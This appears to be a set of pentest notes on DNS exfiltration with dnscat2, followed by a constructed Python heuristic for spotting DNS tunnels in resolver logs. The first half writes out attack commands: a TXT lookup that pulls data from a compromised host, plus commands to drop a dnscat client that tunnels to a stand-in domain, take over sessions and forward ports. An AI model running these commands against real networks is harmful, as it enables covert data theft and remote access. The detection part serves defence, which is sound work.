Data can be exfiltrated using DNS records and the DNS protocol itself.
Create a TXT record on the compromised server and exfiltrate the data line by line
nslookup -type=txt exfiltrated.data.dogs.corp
Spin up the dnscat2 server
dnscat2-server feline.corp
Drop the client binary on the compromised host and create the tunnel
./dnscat feline.corp
View sessions
windows
Interact with a session
window -i 1
Set up a port forward
listen 0.0.0.0:1338 172.16.192.217:4646
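
For defenders, both techniques above show up in resolver logs: a dnscat2 tunnel carries its traffic as encoded labels under the tunnel domain, so one parent domain collects many unique, long, high-entropy subdomains. The following detection heuristic is an added example, not part of the original notes; the log format, sample lines, function names and thresholds are constructed assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log, one query per line: "<client> <qtype> <qname>".
# The log format and every value in it are assumptions made for this example.
SAMPLE_LOG = """\
10.0.0.5 A www.example.org
10.0.0.5 A mail.example.org
10.0.0.5 A api.example.org
10.0.0.6 A d1a2b3c4e5f6a7b8c9d0e1f2a3b4c5d6.cdn.example.net
10.0.0.6 A d1a2b3c4e5f6a7b8c9d0e1f2a3b4c5d6.cdn.example.net
10.0.0.7 TXT exfiltrated.data.dogs.corp
10.0.0.7 TXT a3f09c1e7b2d48560f9e8d7c6b5a4132.feline.corp
10.0.0.7 CNAME 7be2d1a0c9f8436551f0a2b3c4d5e6978.feline.corp
10.0.0.7 TXT 0c1d2e3f4a5b69788796a5b4c3d2e1f0.feline.corp
10.0.0.7 MX f1e2d3c4b5a6978889706a5b4c3d2e1f.feline.corp
"""

def shannon_entropy(text):
    """Bits per character; encoded payloads score higher than ordinary hostnames."""
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values()) if text else 0.0

def find_tunnel_candidates(log, min_unique=3, min_avg_len=24, min_entropy=3.0):
    """Return {parent_domain: stats} for domains whose subdomains look like payloads."""
    seen = defaultdict(lambda: {"subs": set(), "non_address": 0})
    for line in log.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines
        _client, qtype, qname = fields
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # no subdomain part that could carry data
        # Simplification: treat the last two labels as the registered domain.
        entry = seen[".".join(labels[-2:])]
        entry["subs"].add("".join(labels[:-2]))
        entry["non_address"] += qtype.upper() not in ("A", "AAAA")
    flagged = {}
    for domain, entry in seen.items():
        subs = entry["subs"]
        avg_len = sum(map(len, subs)) / len(subs)
        avg_entropy = sum(map(shannon_entropy, subs)) / len(subs)
        if len(subs) >= min_unique and avg_len >= min_avg_len and avg_entropy >= min_entropy:
            flagged[domain] = {"unique_subdomains": len(subs), "avg_len": round(avg_len, 1),
                               "avg_entropy": round(avg_entropy, 2),
                               "non_address_queries": entry["non_address"]}
    return flagged

if __name__ == "__main__":
    print(find_tunnel_candidates(SAMPLE_LOG))
```

The repeated long CDN-style name and the single TXT lookup are not flagged because each contributes only one unique subdomain; slow line-by-line TXT retrieval needs a longer observation window or a per-client count of TXT queries.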